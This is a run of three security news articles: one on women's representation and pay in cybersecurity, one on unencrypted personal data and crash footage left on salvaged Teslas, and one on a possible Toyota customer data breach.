Not only are young girls – and boys – gradually getting more tech exposure at an earlier age, but cybersecurity education is emerging, with more undergraduate and graduate programs.

“When I was growing up in the industry, there wasn’t any type of academia around cybersecurity, even at the college level. Security experience mostly came from government and niche roles and backgrounds,” says Jennifer Minella, chairperson on the (ISC)2 board of directors and vice president of engineering and security at Carolina Advanced Digital.

Now there are programs, such as the CyberPatriot youth cyber education initiative for K-12, that provide cybersecurity exposure and education, according to Minella. “It’s reaching down to people at a younger age now,” she says.

Meanwhile, the gender pay gap hasn’t budged. Women still make less than men overall: while nearly 30% of men in the US make between $50,000 and $99,999, just 17% of women do. One-fifth of men make $100,000-plus, while 16% of women do. Overall, women make $5,000 less than men in security management positions, according to the (ISC)2 report.

Millennial women, however, are making better salaries than previous generations of women. Twenty-one percent of Millennial women earn $50,000 to $99,999, compared with 29% of Millennial men. Even more interesting, 3% more Millennial women than men of that generation make $100,000-plus.

Just 10% of Baby Boomer women fell into the $50,000 to $99,999 salary range, compared with 30% of Boomer men. As for Generation X, there was a 12-point gap between men and women making $50,000 to $99,999. And 12% more Baby Boomer men make $100,000-plus than women of that age group.

“The pay gap was still [about the same],” de Leeuw says. “The next step is getting equal pay for women. … We’re getting there.”

Interestingly, more women are filling some of the higher-level job positions than men: Seven percent of women in the survey are chief technology officers, versus 2% of men; 9% are vice presidents of IT, versus 5% of men; 18% are IT directors, versus 14% of men; and 28% of women are C-level executives, versus 19% of men. There were 15 female CISOs in the study, compared with 32 male CISOs.

Women Better Schooled
Women hold more post-graduate degrees than men, 52% versus 44%, and women consider certifications and grad school more valuable than men do, according to the study. Women, on average, hold more certs than men.

The advanced degree and certification statistics follow a trend (ISC)2 first spotted in its 2015 women in cybersecurity report, in which 58% of women in senior positions held a master’s degree or a doctorate, while 47% of males in leadership positions did. That study also showed that women dominated the governance, risk, and compliance (GRC) side of security: one in five women in security held a GRC position, while just one in eight men did.

In a similar vein, a recent International Association of Privacy Professionals (IAPP) study of the Fortune 100 top publicly traded companies showed more women (53%) than men (47%) in the privacy profession in the US. The chief privacy officer position is twice as likely to be held by a woman as by a man, that data shows.

Even so, there’s still a wide gender gap in cybersecurity.

“Twenty-four percent is a nice baseline from where we can move forward,” (ISC)2’s de Leeuw says. She hopes it will inspire more women to enter the cybersecurity sector.

“This is a huge step,” she says. “When I founded Women in Cybersecurity in 2012 in Holland, we had only four women working in cybersecurity. I knew all of them in the entire country. Compare that to where we are today, with women making up 24% of the [overall cybersecurity] workforce.”

Article source: https://www.darkreading.com/risk/women-now-hold-one-quarter-of-cybersecurity-jobs/d/d-id/1334319?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Wrecked Teslas hang onto your (unencrypted) data

A Tesla gets run down by a truck hauling a jet engine. Ouch.

The car winds up in a salvage lot in Maryland. The driver, hopefully, doesn’t wind up in a hospital. But the video of it all remains, safe and sound, on that wrecked car, unencrypted and available for all to see.

If you want to see the video of a Tesla and its collision with a jet engine, or videos of Teslas careening off of snowy roads and/or plowing into trees, you can check out #TeslaCrashFootage on Twitter.

You’re able to do so because crashed Teslas being sold at junkyards and auctions are retaining what CNBC says is “deeply personal” and unencrypted data, including video from the car’s cameras that show what happened moments before the accident.

The unencrypted videos – plus phonebooks, calendar items, location and navigational data – were extracted by a security researcher who calls himself GreenTheOnly. The researcher retrieved the content from Model S, Model X and Model 3 vehicles purchased for testing and research from salvage.

GreenTheOnly, who identifies himself as a white hat hacker and a Tesla fan who drives a Model X, agreed to speak with CNBC and to share data and video with the news outlet on the condition of “pseudonymity,” citing privacy concerns. CNBC identifies the researcher as a “he,” so we’ll follow suit. He’s reportedly made tens of thousands of dollars from Tesla bug bounties in recent years.

Tesla’s split personality WRT privacy

Leaving data unencrypted on a car that’s headed to the junkyard isn’t exactly consistent with how tight-fisted Tesla is with privacy under other circumstances. Tesla drivers involved in car crashes say that they’ve had to wrestle to get data upon request, particularly when they don’t see eye-to-eye with Tesla about whether the crash was due to driver error or defective technology, as Consumer Affairs reported last year.

In January 2018, three people complained that their Tesla Model S surged on its own as they were about to park. A Tesla rep refused to give one of those people a computer-generated report, one driver said, in spite of the gobs of data that Tesla collects.

Consumer Affairs quoted a report from a Miami Beach couple whose inquiries for data from their car’s computer were rebuffed by Tesla, which told them to go get a subpoena if they wanted the data:

They advised that the throttle went suddenly from 2% to 97%, and then the brake was applied, but when I asked for more details about the approach to the parking space, for a copy of the report they said they would not provide it without a subpoena.

Tesla has used the “get a lawyer” approach in previous cases of people wanting to see their cars’ computer data. When Consumer Affairs asked the company why Tesla would force drivers to file for a subpoena to get at their own data, a spokesperson said it has to do with keeping the data private… apparently, even from the customers themselves. Here, they referred to the company’s customer privacy policy:

We handle all customer data in accordance with our Owner’s Manual and privacy policy, which clearly outlines the type of data we collect and the lengths that we go to protect a customers’ privacy in the process.

The company also directs customers to fork over $995 to a third-party vendor called Crash Data Group, which sells cables that might – there’s no guarantee – capture the data associated with an event in question.

An expensive hoop to jump through, that, and one that would seem superfluous, given that Tesla engineers apparently already have computer data concerning crash causes. From Consumer Affairs:

Tesla engineers have given consumers… the impression that they already have extensive data, not just about the crash itself but about the actions that drivers took leading up to the crash.

According to GreenTheOnly’s research, that data stays on the Tesla Model S, Model X or Model 3: it’s not automatically erased when a car is hauled away from a crash site or auctioned off.

A former employee of Manheim – an automotive auction company that Tesla sometimes hires to inspect, recondition and sell used cars – told CNBC that employees don’t do a factory reset on the cars’ computers.

In one instance late last year, GreenTheOnly and fellow white hat hacker Theo – who’s repaired hundreds of wrecked Teslas – bought a totaled white Model 3. It had been owned by a construction company somewhere around Boston and had been used by various employees, the researchers discerned. In fact, they found that the car’s computers had stored data from at least 17 different devices, none of it encrypted.

Mobile phones or tablets had paired to the car around 170 times. The Model 3 held 11 phonebooks’ worth of contact information from drivers or passengers who had paired their devices, and calendar entries with descriptions of planned appointments, and e-mail addresses of those invited.

The data also showed the drivers’ last 73 navigation locations, including residential addresses, the Wequassett Resort and Golf Club, and local Chick-fil-A and Home Depot locations.

The wrecked car’s computer still contained footage from one of the Model 3’s seven cameras, including the forward-facing view of the wreck that totaled the car, plus a clip of a previous, less serious side rail scrape.

Leaving personal data on cars is generally associated with rental cars. As CNBC points out, the Federal Trade Commission (FTC) has repeatedly warned drivers about pairing their devices to rental cars and has urged them to learn how to wipe their cars’ systems clean before returning a rental or selling a car.

The Verge points out that rentals don’t collect nearly as much data as cars that are driven for longer periods by those who own them. Plus, the data they collect is growing ever more granular, given the growing number of sensors and computers they’re outfitted with.

It’s not too late to wipe it, wipe it good

As one security researcher noted, for better or worse, the car manufacturers are putting the onus for data wiping on consumers. The Verge quoted Ashkan Soltani, a security researcher and former chief technologist for the FTC:

I do think automakers should be taking steps to make sure that information isn’t available to unauthorized access (secondary owners or used car dealerships, for example). Location and contacts are incredibly personal and sensitive, [and] I think it’s problematic to leave that information laying around. Specially given that unlike mobile phones, cars typically stay in circulation for decades.

We’ve got to treat these cars as computers on wheels and start wiping them before we sell them, as well as after they’re banged up, sitting in junkyards – even if their screens are shattered.

If we don’t do it, it sounds like nobody else will.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/4dSVkzWxvGo/

Possible Toyota data breach affecting 3.1 million customers

Several Toyota companies have announced that they might have suffered data breach attempts, with one affecting 3.1 million Toyota and Lexus customers.

In a brief account describing the most significant of these, the Japanese parent company said that on 21 March attackers gained “unauthorized access on the network” which led them to customer data belonging to eight sales subsidiaries in the country.

Toyota said it is still investigating what data might have been breached, or even whether any data has been breached:

We have not confirmed the fact that customer information has been leaked at this time, but we will continue to conduct detailed surveys, placing top priority on customer safety and security.

So far, it has at least managed to establish that…

…The information that may have been leaked this time does not include information on credit cards.

Clearly, the company isn’t taking any chances and has decided to tell its customers something now rather than sitting on bad news.

Normally a data breach affecting Japanese Toyota subsidiaries wouldn’t get that much attention if it weren’t for the fact that it fits a larger pattern of attacks against the company.

A day after Toyota announced the Japanese breach, its subsidiaries in Vietnam and Thailand made separate statements about suspected attacks. Toyota Vietnam posted the following on its website:

Toyota Motor Vietnam has come to be aware of a possibility that the company was targeted by a cyberattack and that some of its customer data may have been potentially accessed.

These statements echo the uncertainty of the Japanese announcement about what, if anything, the attackers were able to access.

In February, meanwhile, Toyota Australia said it had been targeted by attackers in an “attempted” cyberattack that was not successful in stealing data despite disrupting parts delivery and some other systems.

At least one security analysis has connected these attacks to a single entity, dubbed APT32 (the OceanLotus Group), which has a history of highly targeted attacks against the automotive industry and other sectors dating back to 2013.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/9iXNWSNtJwc/